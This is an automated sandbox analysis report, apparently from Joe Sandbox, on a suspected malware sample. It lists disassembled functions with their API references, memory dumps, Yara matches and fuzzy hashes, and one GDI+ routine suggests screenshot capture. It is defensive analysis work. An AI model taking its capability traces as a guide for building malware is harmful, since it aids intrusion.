Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 02514FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02514FCA
int.LIBCPMT ref: 02514FE1

Part of subcall function 0251BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0251BFD4
Part of subcall function 0251BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0251BFEE

std::locale::_Getfacet.LIBCPMT ref: 02514FEA
std::_Facet_Register.LIBCPMT ref: 0251501B
std::_Lockit::~_Lockit.LIBCPMT ref: 02515031
__CxxThrowException@8.LIBVCRUNTIME ref: 0251504F

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 41285cb9acf8a612b50241ec669813cc55d1cab93895e933835453c4b12706cf
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: 24118632D0021A9BEB15EBA4C844AFD7776BF84714F940519E415672D0EB749E05CFD8

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 0251C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0251C401
int.LIBCPMT ref: 0251C418

Part of subcall function 0251BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0251BFD4
Part of subcall function 0251BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0251BFEE

std::locale::_Getfacet.LIBCPMT ref: 0251C421
std::_Facet_Register.LIBCPMT ref: 0251C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0251C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0251C486

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: b95a0b23d5d2925e8e1562dded2f69d5cb49072e45be4ddf1e03c4bd97132dd6
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: F511E572C4022A9BEB15FB64C845AFD7B72BF80716F10051AE811BB2D0DF758A01CF99

Function 02514E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02514E8C
int.LIBCPMT ref: 02514EA3

Part of subcall function 0251BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0251BFD4
Part of subcall function 0251BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0251BFEE

std::locale::_Getfacet.LIBCPMT ref: 02514EAC
std::_Facet_Register.LIBCPMT ref: 02514EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 02514EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 02514F11

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: cc1f2f46213f33dd060918d9f11521decb78e473f88588d959c75f83141f34aa
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 3711A172C0022A9BEF15EBA4D844AEE7B76BF84724F140519E810A72D0DF789E05CF99

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

mscoree.dll, xrefs: 0042FEFD
CorExitProcess, xrefs: 0042FF0F

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 025508F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 025508F8
make_shared.LIBCPMT ref: 02550943

Strings

MOC, xrefs: 0255091B
RCC, xrefs: 0255092A
v)D, xrefs: 025508F3

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: 161a8c17d23e777d934f92531ac3ddb08c8c3fe512fe9baa31732e322b7ee5b1
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 8DF04F72A00625EFDB16FF64C42066C3B75BF99B04F459096F8405B2A0CB789A48CFAD

Function 0253B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: 028de658b45fd1ae410ea10207c074223c803a22649c354b58af4cfc68892b62
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: C871A57290021A9BCB23CF94C884ABFBF76FF4576CF54662AE41157180EB708D41CBA9

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 02540CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0254390E: RtlAllocateHeap.NTDLL(00000000,0251DAD7,00000000), ref: 02543940

_free.LIBCMT ref: 02540DB6
_free.LIBCMT ref: 02540DCD
_free.LIBCMT ref: 02540DEC
_free.LIBCMT ref: 02540E07
_free.LIBCMT ref: 02540E1E

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: dc01dc6fba5d9eece99ef6f3528adeb9f89111cb3ad821852127eb71d303df66
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: F251C571A00705AFDB24DF29C841B6AFBF5FF44728B244569E909D7290EB35E911CB88

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 02541742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 025417B4
_free.LIBCMT ref: 025417D4

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: 027f840fd9d37e65696ac032c8080acaf44bf703ea1d41c4236cfb275b24e0b7
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: 8441D136A007149FCB14DF78C880A5DB7F6FF85728B1585A9D915EB381DB31E901CB88

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0252B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0252B152

Part of subcall function 02521188: _SpinWait.LIBCONCRT ref: 025211A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0252B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0252B198
List.LIBCMT ref: 0252B21B
List.LIBCMT ref: 0252B22A

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: 81937053231d61080f7fec0624d203eeb6d692d62a2f9baaf4170afd8741f562
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 8C316A32D01676DFCB14EFA4C5806EDBBB2BF86308F04406AC411776C1CB316A08CB99

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 025150C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 025150A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 025150B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0251511C
__Getcoll.LIBCPMT ref: 0251512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0251513B

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: 7683aba8268e7d9c5ff5d1074dad588f1a91e5092249c621edc11ac830346ebe
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: B121CF71854306AFEB01EFA0C444BECBBB1BF90716F90840AE4816B180EBB48944CF9A

Function 025421C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

